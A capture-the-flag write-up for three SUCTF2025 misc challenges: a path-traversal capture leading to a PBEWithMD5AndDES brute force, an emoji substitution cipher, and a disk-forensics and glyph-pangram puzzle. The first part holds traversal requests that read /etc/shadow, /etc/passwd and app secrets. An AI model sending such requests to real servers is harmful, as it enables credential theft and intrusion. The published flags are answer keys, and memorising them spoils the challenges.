SUCTF2025 Misc section
SU_checkin
The requests in the capture that got an HTTP 200 response:
GET /download?filename=../../../../../../../../../root/flag.txt HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../root/flag.txt"
Content-Type: application/octet-stream
Content-Length: 7
Date: Thu, 09 Jan 2025 06:59:21 GMT
Keep-Alive: timeout=60
Connection: keep-alive
nonono
GET /download?filename=../../../../../../../../../proc/self/cmdline HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cmdline"
Content-Type: application/octet-stream
Content-Length: 65
Date: Thu, 09 Jan 2025 06:59:26 GMT
Keep-Alive: timeout=60
Connection: keep-alive
java-jarsuctf-0.0.1-SNAPSHOT.jar--password=SePassWordLen23SUCT
GET /download?filename=../../../../../../../../../root/start.sh HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../root/start.sh"
Content-Type: application/octet-stream
Content-Length: 1
Date: Thu, 09 Jan 2025 06:59:32 GMT
Keep-Alive: timeout=60
Connection: keep-alive
GET /download?filename=../../../../../../../../../proc/self/cwd/BOOT-INF/classes/hint HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cwd/BOOT-INF/classes/hint"
Content-Type: application/octet-stream
Content-Length: 27
Date: Thu, 09 Jan 2025 06:59:38 GMT
Keep-Alive: timeout=60
Connection: keep-alive
algorithm=PBEWithMD5AndDES
GET /download?filename=../../../../../../../../../etc/shadow HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../etc/shadow"
Content-Type: application/octet-stream
Content-Length: 909
Date: Thu, 09 Jan 2025 06:59:43 GMT
Keep-Alive: timeout=60
Connection: keep-alive
root:$6$MI.uuGSS7qKn4rEK$NlYB/kaAeRmd3CYY4mxDuMMMh1PzQZHTEL.BV3Dosp.15kD3MgSDzqbYRRazeglIRVAfe6ATwRZ9ekSwNTkit0:20077:0:99999:7:::
daemon:*:20007:0:99999:7:::
bin:*:20007:0:99999:7:::
sys:*:20007:0:99999:7:::
sync:*:20007:0:99999:7:::
games:*:20007:0:99999:7:::
man:*:20007:0:99999:7:::
lp:*:20007:0:99999:7:::
mail:*:20007:0:99999:7:::
news:*:20007:0:99999:7:::
uucp:*:20007:0:99999:7:::
proxy:*:20007:0:99999:7:::
www-data:*:20007:0:99999:7:::
backup:*:20007:0:99999:7:::
list:*:20007:0:99999:7:::
irc:*:20007:0:99999:7:::
gnats:*:20007:0:99999:7:::
nobody:*:20007:0:99999:7:::
_apt:*:20007:0:99999:7:::
systemd-timesync:*:20077:0:99999:7:::
systemd-network:*:20077:0:99999:7:::
systemd-resolve:*:20077:0:99999:7:::
messagebus:*:20077:0:99999:7:::
sshd:*:20077:0:99999:7:::
hacker:$6$rzdplO02wm/607Io$v9gjdKBiuEdA0F28qx1REs/L4Qo9dqBQD.fUUjans5qn/sWOjSffHWzlMvgwzxHyyrfSA8kLilzMMRGhRNHLk0:20077:0:99999:7:::
GET /download?filename=../../../../../../../../../proc/self/cwd/BOOT-INF/classes/application.properties HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cwd/BOOT-INF/classes/application.properties"
Content-Type: application/octet-stream
Content-Length: 133
Date: Thu, 09 Jan 2025 06:59:47 GMT
Keep-Alive: timeout=60
Connection: keep-alive
spring.application.name=suctf
server.port = 8888
OUTPUT=ElV+bGCnJYHVR8m23GLhprTGY0gHi/tNXBkGBtQusB/zs0uIHHoXMJoYd6oSOoKuFWmAHYrxkbg=
GET /download?filename=../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../etc/passwd"
Content-Type: application/octet-stream
Content-Length: 1322
Date: Thu, 09 Jan 2025 06:59:53 GMT
Keep-Alive: timeout=60
Connection: keep-alive
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:106::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
hacker:x:1000:1000::/home/hacker:/bin/bash
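The capture above shows a /download endpoint handing out any file the filename parameter points at. As an added example (not code from the writeup or from the challenge's jar), the block below does two things a defender wants: the containment check the endpoint should have performed before opening the file, and a scan over request lines in the capture's format that flags the ones escaping the download directory. The base directory /srv/downloads and the SAMPLE_REQUEST_LINES are constructed assumptions; only the first two lines mirror requests in the capture.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample request lines, modelled on the capture above.
SAMPLE_REQUEST_LINES = [
    "GET /download?filename=../../../../../../../../../root/flag.txt HTTP/1.1",
    "GET /download?filename=../../../../../../../../../proc/self/cmdline HTTP/1.1",
    "GET /download?filename=report.pdf HTTP/1.1",
    "GET /download?filename=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1",  # URL-encoded traversal
    "GET /download?filename=docs/../report.pdf HTTP/1.1",              # stays inside the base dir
]


def resolve_download_path(base_dir, filename):
    """Return the absolute path a request would read, or None if it escapes base_dir.

    This is the check the /download endpoint was missing. Paths are handled as
    POSIX strings so the function is deterministic offline; on a real server,
    also run os.path.realpath on the result so symlinks cannot point outside.
    """
    base = posixpath.normpath(base_dir)
    decoded = filename
    for _ in range(3):  # peel repeated URL encoding (%252e%252e -> %2e%2e -> ..)
        new = unquote(decoded)
        if new == decoded:
            break
        decoded = new
    decoded = decoded.replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


def flag_traversal_requests(request_lines, base_dir="/srv/downloads", param="filename"):
    """Return (request_line, decoded_value) for every /download request whose
    file parameter escapes base_dir. Meant for scanning an access log or a
    capture after the fact, i.e. detection rather than blocking."""
    hits = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        url = urlsplit(parts[1])
        if url.path != "/download":
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if resolve_download_path(base_dir, value) is None:
                hits.append((line, value))
    return hits


if __name__ == "__main__":
    for line, value in flag_traversal_requests(SAMPLE_REQUEST_LINES):
        print("traversal:", value, "<-", line)
```

Run as-is it reports the three traversal lines and stays quiet on the two legitimate ones; note that docs/../report.pdf is accepted because it normalises to a path still under the base directory, which is the behaviour you want from a containment check rather than a naive ".." string match.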
The hacker user's hash in the shadow file can be cracked to the password hacker, but I didn't find anywhere to use it.
Useful items:
java -jar suctf-0.0.1-SNAPSHOT.jar --password=SePassWordLen23SUCT
algorithm=PBEWithMD5AndDES
spring.application.name=suctf
server.port = 8888
OUTPUT=ElV+bGCnJYHVR8m23GLhprTGY0gHi/tNXBkGBtQusB/zs0uIHHoXMJoYd6oSOoKuFWmAHYrxkbg=
PBEWithMD5AndDES: OUTPUT looks like the ciphertext, and the password appears to be SePassWordLen23SUCT.
Reading the password literally, the password length is 23, but SePassWordLen23SUCT is only 19 characters.
SUCT should be SUCTF, which leaves three more characters.
Brute force. A PBEWithMD5AndDES decryption script for reference:
https://github.com/binsgit/PBEWithMD5AndDES/blob/master/python/PBEWithMD5AndDES_2.py
With minor modifications, we get:
import base64
import hashlib
import string
import itertools
from Crypto.Cipher import DES  # pycryptodome


def get_derived_key(password, salt, count):
    # PKCS#5 PBKDF1 with MD5: hash password||salt, then re-hash the digest
    # count times. The first 8 bytes are the DES key, the last 8 the CBC IV.
    if isinstance(password, str):
        password = password.encode('utf-8')
    key = password + salt
    for i in range(count):
        m = hashlib.md5(key)
        key = m.digest()
    return (key[:8], key[8:])


def decrypt(msg, password):
    # Layout of OUTPUT: base64( 8-byte salt || DES-CBC ciphertext )
    msg_bytes = base64.b64decode(msg)
    salt = msg_bytes[:8]
    enc_text = msg_bytes[8:]
    (dk, iv) = get_derived_key(password, salt, 1000)
    crypter = DES.new(dk, DES.MODE_CBC, iv)
    decrypted_data = crypter.decrypt(enc_text)
    padding_len = decrypted_data[-1]
    if not 1 <= padding_len <= 8:
        return ''  # not valid PKCS#5 padding, so this password is wrong
    text = decrypted_data[:-padding_len]
    return text.decode('utf-8', errors='ignore')


def generate_passwords(known_part, length):
    # Enumerate every candidate: known prefix plus the missing characters
    remaining_length = length - len(known_part)
    characters = string.digits + string.ascii_uppercase + string.ascii_lowercase
    for combination in itertools.product(characters, repeat=remaining_length):
        yield known_part + ''.join(combination)


s = "ElV+bGCnJYHVR8m23GLhprTGY0gHi/tNXBkGBtQusB/zs0uIHHoXMJoYd6oSOoKuFWmAHYrxkbg="
known_part = "SePassWordLen23SUCTF"
total_length = 23
for password in generate_passwords(known_part, total_length):
    print(password)
    decrypted_text = decrypt(s, password)
    if "SUCTF{" in decrypted_text:
        print(f"Found password: {password}")
        print(f"Decrypted text: {decrypted_text}")
        break
Running it gives:
flag: SUCTF{338dbe11-e9f6-4e46-b1e5-eca84fb6af3f}
SU_RealCheckin
hello ctf -> 🏠🦅🍋🍋🍊 🐈🌮🍟
$flag -> 🐍☂️🐈🌮🍟{🐋🦅🍋🐈🍊🏔️🦅_🌮🍊_🐍☂️🐈🌮🍟_🧶🍊☂️_🐈🍎🌃_🌈🦅🍎🍋🍋🧶_🐬🍎🌃🐈🦅}
From hello ctf one can see that each emoji stands for the first letter of the English word for the thing it depicts.
So:
🏠 -> h
🦅 -> e
🍋 -> l
🍊 -> o
🐈 -> c
🌮 -> t
🍟 -> f
🐍 -> s
☂️ -> u
🐋 -> w
🏔️ -> m
🧶 -> y
🍎 -> a
🌃 -> n
🌈 -> r
🐬 -> d
Substituting gives:
flag: suctf{welcome_to_suctf_you_can_really_dance}
SU_forensics
Per the challenge description and common sense: although the .bash_history file was deleted, its blocks on disk were only freed for overwriting, not actually wiped. The sudo reboot mentioned in the description is very important, because only that command gets recorded; the deletion commands run afterwards are not. So we search the whole disk with DiskGenius for sudo reboot and find the deleted .bash_history.
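The recovery step above relies on an unlinked file's data blocks surviving until something overwrites them, which is why a raw string search for sudo reboot still lands on the history. As an added example (not part of the original writeup), the block below carves every printable run containing a marker out of a byte buffer, the same thing a hex editor's text search does. FAKE_DISK_IMAGE and the history lines inside it are constructed; on a real case you would feed the image or partition to these functions in chunks.

```python
import re

# Constructed stand-in for a raw disk image: filler bytes and leftovers of other
# files around an unlinked .bash_history whose data block was never overwritten.
FAKE_DISK_IMAGE = (
    b"\x00" * 64
    + b"\xff\xd8\xff\xe0 junk from another file \x00\x00"
    + b"ls -la\ncat notes.txt\nsudo reboot\ncurl https://example.invalid/post\nrm .bash_history\n"
    + b"\x00" * 32
    + b"unrelated text without the marker\n"
    + b"\x00" * 16
)

# A printable run: tab, LF, CR and the ASCII graphic range. Anything else
# (NULs, binary headers of other files) ends the run.
PRINTABLE = re.compile(rb"[\x09\x0a\x0d\x20-\x7e]+")


def carve_text_around(image, marker=b"sudo reboot", min_len=8):
    """Return (offset, text) for every printable run in `image` that contains
    `marker`. Each run is the contiguous ASCII region an unlinked file's data
    block left behind, so it recovers the whole file fragment, not just the
    marker line."""
    hits = []
    for run in PRINTABLE.finditer(image):
        text = run.group()
        if marker in text and len(text) >= min_len:
            hits.append((run.start(), text.decode("ascii")))
    return hits


def history_commands(image, marker=b"sudo reboot"):
    """Split each carved run into shell history lines, dropping empty ones."""
    lines = []
    for _, text in carve_text_around(image, marker):
        lines.extend(line for line in text.split("\n") if line)
    return lines


if __name__ == "__main__":
    for offset, text in carve_text_around(FAKE_DISK_IMAGE):
        print(f"hit at offset {offset}:")
        print(text)
```

The offset is what you would carry over to a hex editor or to dd to pull the surrounding block; for a real image, read it in overlapping chunks so a run straddling a chunk boundary is not missed.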
We can see that a cnblogs article was fetched with curl; visiting it shows the article has since been deleted (404), so we use web.archive.org to view a snapshot of the page:
There is a GitHub project; following it, the branch called secret has been deleted, but Activity still records the whole process:
Here we view and extract lost_flag.txt. The decompression script is in the project, and the password can be extracted by doing some operations on the image in the page snapshot:
import binascii
import os
import pyzipper

# File and directory names
txt_filename = 'lost_flag.txt'
zip_filename = 'secret.zip'
output_dir = 'lost_flag'
password = '2phxMo8iUE2bAVvdsBwZ'

# Read the hex data from the text file
with open(txt_filename, 'r') as txt_file:
    hex_data = txt_file.read().strip()

# Convert the hex data back into binary
binary_data = binascii.unhexlify(hex_data)

# Write the binary data out as a ZIP file
with open(zip_filename, 'wb') as zip_file:
    zip_file.write(binary_data)

# Create the output directory
os.makedirs(output_dir, exist_ok=True)

# Extract the AES-encrypted ZIP with pyzipper
with pyzipper.AESZipFile(zip_filename, 'r', compression=pyzipper.ZIP_DEFLATED, encryption=pyzipper.WZ_AES) as extracted_zip:
    extracted_zip.extractall(output_dir, pwd=str.encode(password))

print(f"Files extracted to directory {output_dir}")
We get lost_flag.png:
[image: lost_flag.png]
A pile of scribbles. On inspection there are 27 distinct glyphs in total, so the guess is the 26 letters plus a space.
Within each line of glyphs, every few glyphs the same one recurs;
the guess is that this one represents the space.
Split the image into tiles to get the order in which each glyph appears:
from PIL import Image
import zlib
import os


def calculate_crc(image):
    # CRC32 of the raw pixel bytes identifies a tile; identical glyphs collide
    image_bytes = image.tobytes()
    return zlib.crc32(image_bytes)


def split_and_save(image_path, rect_size):
    image = Image.open(image_path)
    image_width, image_height = image.size
    rect_width, rect_height = rect_size
    seen_crc = set()
    output_dir = 'output_images'
    os.makedirs(output_dir, exist_ok=True)
    image_counter = 1
    # Walk the grid row by row; save each tile the first time it is seen
    for top in range(0, image_height, rect_height):
        for left in range(0, image_width, rect_width):
            box = (left, top, left + rect_width, top + rect_height)
            cropped_image = image.crop(box)
            crc = calculate_crc(cropped_image)
            if crc in seen_crc:
                continue
            seen_crc.add(crc)
            cropped_image_path = os.path.join(output_dir, f'img_{image_counter}.png')
            cropped_image.save(cropped_image_path)
            print(f'Saved: {cropped_image_path}')
            image_counter += 1


split_and_save('./lost_flag.png', (138, 108))
Running it gives:
28 images in total; of these, the second:
the second-to-last:
and the last:
Build a table from these and convert the glyphs to letters:
from PIL import Image

image = Image.open('./lost_flag.png')
rect_size = 138, 108
# Letters assigned in order of first appearance; '#' is the tile that is
# skipped, the second slot is the space glyph
chrset = 'a bcdefghijklmnopqrstuvwxy#z'
m = {}
code = ''
for j in range(12):
    for i in range(69):
        x, y = i * rect_size[0], j * rect_size[1]
        region = image.crop((x, y, x + rect_size[0], y + rect_size[1]))
        if region.tobytes() not in m:
            m[region.tobytes()] = chrset[len(m)]
        ch = m[region.tobytes()]
        if ch != '#':
            code += ch
    code += '\n'
print(code)
Running it gives:
a bcdef ghijkl mnop qhrdst uavw xdy
vlhu zihedandghu ds wjh xom ov yafdst qhlk bamandzwde par wokz
zdr vlhsgdhu fdstz qophu wo amondzj yk bcdwh idwdvcn xoczwz
yak xo hbcan yk voondzj lheolu mk zonqdst zdr icggnhz a phhf
jallk dz xottdst bcdefnk pjdej arhu ghs yosfz pdwj amcsuasw qaiol
ucyik fdmdwghl xdstnhz az bcdrowde oqhlvnopz
skyij zdst vol bcdef xdtz qhr mcu ds ghzwvcn wpdndtjw
zdyinh vor jhnu bcalwg ucef xczw mk pdst
zwlost mldef bcdg pjastz xcyik vor qdqdunk
tjozwz ds yhyolk idefz ci bcalwg asu qancamnh oskr xhphnz
ihszdqh pdgaluz yafh worde mlhp vol wjh hqdn bawald fdst asu plk xaef
ann ocwuawhu bchlk azfhu mk vdqh pawej hrihlwz ayaghu wjh xcuth
quipqiup gives:
a quick zephyr blow vexing daft jim
fred specialized in the job of making very qabalistic wax toys
six frenzied kings vowed to abolish my quite pitiful jousts
may jo equal my foolish record by solving six puzzles a week
harry is jogging quickly which axed zen monks with abundant vapor
dumpy kibitzer jingles as quixotic overflows
nymph sing for quick jigs vex bud in zestful twilight
simple fox held quartz duck just by wing
strong brick quiz whangs jumpy fox vividly
ghosts in memory picks up quartz and valuable onyx jewels
pensive wizards make toxic brew for the evil qatari king and wry jack
all outdated query asked by five watch experts amazed the judge
After translating them and searching on Baidu, these turn out to be short sentences that contain all 26 letters (pangrams); reference:
https://www.fleetingimage.com/wij/gd212/01-pangrams.html
Comparing the sentences:
a quick zephyr blow vexing daft jim
Quick zephyrs blow, vexing daft Jim.
Compared with the sentence on the site, ours is missing the letter s. The later sentences likewise contain only 25 letters each, so check which letter each sentence is missing:
import string


def find_missing_letters(sentence):
    # Letters of the alphabet that never occur in the sentence
    all_letters = set(string.ascii_lowercase)
    sentence_letters = set(sentence.lower())
    missing_letters = all_letters - sentence_letters
    return missing_letters


sentences = [
    "a quick zephyr blow vexing daft jim",
    "fred specialized in the job of making very qabalistic wax toys",
    "six frenzied kings vowed to abolish my quite pitiful jousts",
    "may jo equal my foolish record by solving six puzzles a week",
    "harry is jogging quickly which axed zen monks with abundant vapor",
    "dumpy kibitzer jingles as quixotic overflows",
    "nymph sing for quick jigs vex bud in zestful twilight",
    "simple fox held quartz duck just by wing",
    "strong brick quiz whangs jumpy fox vividly",
    "ghosts in memory picks up quartz and valuable onyx jewels",
    "pensive wizards make toxic brew for the evil qatari king and wry jack",
    "all outdated query asked by five watch experts amazed the judge"
]

# Print the missing letters of each sentence in order, on one line
for i, sentence in enumerate(sentences, 1):
    missing = find_missing_letters(sentence)
    print(''.join(sorted(missing)), end="")
print()
Running it gives:
flag: SUCTF{HAVEFUN}